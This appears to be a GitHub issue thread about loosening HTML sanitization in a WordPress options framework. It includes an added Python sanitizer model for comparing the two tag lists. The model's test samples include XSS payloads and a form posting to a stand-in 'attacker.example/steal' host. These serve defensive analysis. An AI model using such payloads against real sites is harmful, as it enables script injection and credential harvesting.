Replace $allowedtags with $allowedposttags for textarea #61

Closed
devinsays opened this Issue · 9 comments

Devin Price
Owner

The most asked question I get about the framework is how to allow more tags in the textarea. I'm thinking of loosening the sanitization here to use $allowedposttags rather than $allowedtags. I'm also considering doing the same for the info tag. Discuss...

Here's a var dump with the differences:

ALLOWED TAGS:

13 tags (tag: allowed attributes):

a: href, title
abbr: title
acronym: title
b
blockquote: cite
cite
code
del: datetime
em
i
q: cite
strike
strong

ALLOWED POST TAGS:

71 tags (tag: allowed attributes):

address
a: class, href, id, title, rel, rev, name, target
abbr: class, title
acronym: title
article: align, class, dir, lang, style, xml:lang
aside: align, class, dir, lang, style, xml:lang
b
big
blockquote: id, cite, class, lang, xml:lang
br: class
button: disabled, name, type, value
caption: align, class
cite: class, dir, lang, title
code: style
col: align, char, charoff, span, dir, style, valign, width
del: datetime
dd
details: align, class, dir, lang, open, style, xml:lang
div: align, class, dir, lang, style, xml:lang
dl
dt
em
fieldset
figure: align, class, dir, lang, style, xml:lang
figcaption: align, class, dir, lang, style, xml:lang
font: color, face, size
footer: align, class, dir, lang, style, xml:lang
form: action, accept, accept-charset, enctype, method, name, target
h1: align, class, id, style
h2: align, class, id, style
h3: align, class, id, style
h4: align, class, id, style
h5: align, class, id, style
h6: align, class, id, style
header: align, class, dir, lang, style, xml:lang
hgroup: align, class, dir, lang, style, xml:lang
hr: align, class, noshade, size, width
i
img: alt, align, border, class, height, hspace, longdesc, vspace, src, style, width
ins: datetime, cite
kbd
label: for
legend: align
li: align, class
menu: class, style, type
nav: align, class, dir, lang, style, xml:lang
p: class, align, dir, lang, style, xml:lang
pre: style, width
q: cite
s
span: class, dir, align, lang, style, title, xml:lang
section: align, class, dir, lang, style, xml:lang
strike
strong
sub
summary: align, class, dir, lang, style, xml:lang
sup
table: align, bgcolor, border, cellpadding, cellspacing, class, dir, id, rules, style, summary, width
tbody: align, char, charoff, valign
td: abbr, align, axis, bgcolor, char, charoff, class, colspan, dir, headers, height, nowrap, rowspan, scope, style, valign, width
textarea: cols, rows, disabled, name, readonly
tfoot: align, char, class, charoff, valign
th: abbr, align, axis, bgcolor, char, charoff, class, colspan, headers, height, nowrap, rowspan, scope, valign, width
thead: align, char, charoff, class, valign
title
tr: align, bgcolor, char, charoff, class, style, valign
tt
u
ul: class, style, type
ol: class, start, style, type
var

Ryan Olson

I rarely need to allow a ton of classes, so I usually just add to the $allowedtags array manually. Maybe an option for people to select what to add? Is that possible even?

Kathy

What about multiple types of textareas... or different flags that will trigger different levels of sanitization? It might be that I want to give my user a super strict textarea, but then also need to let them put scripts in another.

Thinkmojo

Agree with thatryan: " Maybe an option for people to select what to add? Is that possible even?" that'd be ideal I think.

Devin Price
Owner

The end user shouldn't be making those decisions, that would sort of defeat the purpose.

The developers do have a way to select which tags are allowed and not allowed through the filters. It can even get very granular down to the specific option if needed.

Perhaps this could be made even easier by having a: sanitization -> "custom_sanitization" option in the array but I'm not sure that is that much easier since you will still need to write the custom sanitization function.

But, back to the main issue: I don't see a problem with making "info" less strict, since a developer would be editing that directly anyway.

I guess I'm asking if anyone thinks it will cause trouble to use $allowedposttags over $allowedtags in textarea? (Remember, it also still balances tags)

You could always apply a filter to make it more strict if needed.
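The question in the comment above (does using $allowedposttags instead of $allowedtags in the textarea cause trouble?) is best answered by running both lists against the inputs an attacker would actually try. What follows is an added example, not code from the Options Framework or from WordPress: a small Python model of a kses-style allow-list sanitizer. It uses a constructed subset of the two tag lists from the var_dump above (`ALLOWEDTAGS`, `ALLOWEDPOSTTAGS`), a constructed protocol allow-list (`SAFE_PROTOCOLS`), constructed sample inputs (`SAMPLES`), and helper names (`kses`, `compare`, `safe_url`) that are this example's own. It also models the tag-balancing step the comment mentions. It shows that script tags, event-handler attributes and javascript: URLs are dropped under either list, while img src, form/button and style attributes pass only under the wider one.

```python
"""Allow-list HTML sanitizer modelled on wp_kses (added example; not WordPress code).

Constructed subsets of the two lists from the var_dump above: tag -> allowed attributes.
"""
import re
from html import escape
from html.parser import HTMLParser

ALLOWEDTAGS = {
    "a": {"href", "title"}, "abbr": {"title"}, "acronym": {"title"}, "b": set(),
    "blockquote": {"cite"}, "cite": set(), "code": set(), "del": {"datetime"},
    "em": set(), "i": set(), "q": {"cite"}, "strike": set(), "strong": set(),
}
# Only the $allowedposttags entries this example exercises (constructed subset).
ALLOWEDPOSTTAGS = {
    **ALLOWEDTAGS,
    "a": {"class", "href", "id", "title", "rel", "rev", "name", "target"},
    "img": {"alt", "align", "border", "class", "height", "hspace", "longdesc",
            "vspace", "src", "style", "width"},
    "form": {"action", "accept", "accept-charset", "enctype", "method", "name", "target"},
    "button": {"disabled", "name", "type", "value"},
    "div": {"align", "class", "dir", "lang", "style", "xml:lang"},
    "p": {"class", "align", "dir", "lang", "style", "xml:lang"},
}
SAFE_PROTOCOLS = {"http", "https", "mailto", "ftp"}   # constructed; wp_kses's default list is longer
URL_ATTRS = {"href", "src", "cite", "action", "longdesc"}
VOID = {"img", "br", "hr"}


def safe_url(value):
    """Reject URL values whose scheme is not on the allow-list (javascript:, data:, ...)."""
    # Browsers ignore tab/newline inside a scheme, so strip them before checking.
    v = "".join(ch for ch in value.strip() if ch not in "\t\n\r\x00")
    head = re.split(r"[/?#]", v, maxsplit=1)[0]
    if ":" not in head:
        return True                          # relative URL, no scheme
    return head.split(":", 1)[0].lower() in SAFE_PROTOCOLS


class Kses(HTMLParser):
    """Unknown tags and attributes are dropped; text content is kept and re-escaped."""

    def __init__(self, allowed):
        super().__init__()                   # entity references are decoded before the checks
        self.allowed, self.out, self.stack = allowed, [], []

    def handle_starttag(self, tag, attrs):
        if tag not in self.allowed:
            return                           # tag dropped; its inner text still passes through
        kept = []
        for name, value in attrs:
            if name not in self.allowed[tag]:
                continue                     # onclick, onerror, style on <a> ... never listed
            value = value or ""
            if name in URL_ATTRS and not safe_url(value):
                continue                     # javascript:/data: URL dropped, tag kept
            kept.append(f' {name}="{escape(value, quote=True)}"')
        if tag in VOID:
            self.out.append(f"<{tag}{''.join(kept)} />")
        else:
            self.out.append(f"<{tag}{''.join(kept)}>")
            self.stack.append(tag)           # remembered for balancing

    def handle_endtag(self, tag):
        if tag in VOID or tag not in self.stack:
            return                           # stray or disallowed closer dropped
        while self.stack:                    # close anything left open inside it
            open_tag = self.stack.pop()
            self.out.append(f"</{open_tag}>")
            if open_tag == tag:
                break

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass                                 # comments dropped

    def close(self):
        super().close()
        while self.stack:                    # balance tags the input left open
            self.out.append(f"</{self.stack.pop()}>")


def kses(html, allowed):
    parser = Kses(allowed)
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# Constructed sample inputs, one per thing a reviewer would want to check.
SAMPLES = {
    "script": "<script>alert(1)</script>",
    "handler": '<a href="/x" onclick="alert(1)">x</a>',
    "js_url": '<a href="javascript:alert(1)">x</a>',
    "img": '<img src="https://example.com/a.png" onerror="alert(1)">',
    "form": '<form action="https://attacker.example/steal" method="post"><button>Login</button></form>',
    "style": '<p style="position:fixed;top:0">x</p>',
    "unbalanced": "<b>bold<i>both",
}


def compare(sample):
    """Return (output under $allowedtags, output under $allowedposttags)."""
    return kses(sample, ALLOWEDTAGS), kses(sample, ALLOWEDPOSTTAGS)


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        narrow, wide = compare(sample)
        print(f"{name:10} allowedtags:     {narrow!r}\n{'':10} allowedposttags: {wide!r}")
```

Running it shows the trade-off concretely: neither list lets script execution through, because the tag and attribute allow-lists never contain script, event handlers or javascript: URLs. What the wider list does admit is markup that matters for a theme option: img with an arbitrary src (remote requests from every visitor), form/button (a credential-harvesting form rendered inside the site's own chrome), style attributes (overlay and positioning tricks) and a target attribute on links. On a single-site install where only administrators can save theme options that is usually acceptable, since administrators already hold unfiltered_html; on multisite, or wherever a lower role can reach the options page, narrowing the list again through the framework's filter is the safer default. The model differs from wp_kses in details (it re-escapes text instead of normalising entities, and its protocol list is shorter), so treat it as a way to reason about the two lists, not as a drop-in replacement.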

mayurdotca

It would be great if we could allow HTML within the textarea. Can you tell me how I can test this on my installation? I think I'm supposed to edit line 11 of options-sanitize.php and change something??

Thanks Devin!

Devin Price
Owner

Yes, lines 10 and 11: allowedtags to allowedposttags.

dfrosso

Hi Devin. Great plugin, first of all. Is there a way to allow the "iframe" tag in textarea? This is for using the Google Maps code. Thanks.

Devin Price
Owner

@dfrosso Please read the examples I have in this post: http://wptheming.com/2011/05/options-framework-0-6/

Devin Price
Owner

I'm still getting a lot of requests, even after updating my documentation.

Made the change. If anyone notices any issues, please let me know. A new release still won't be for some time.

devinsays closed this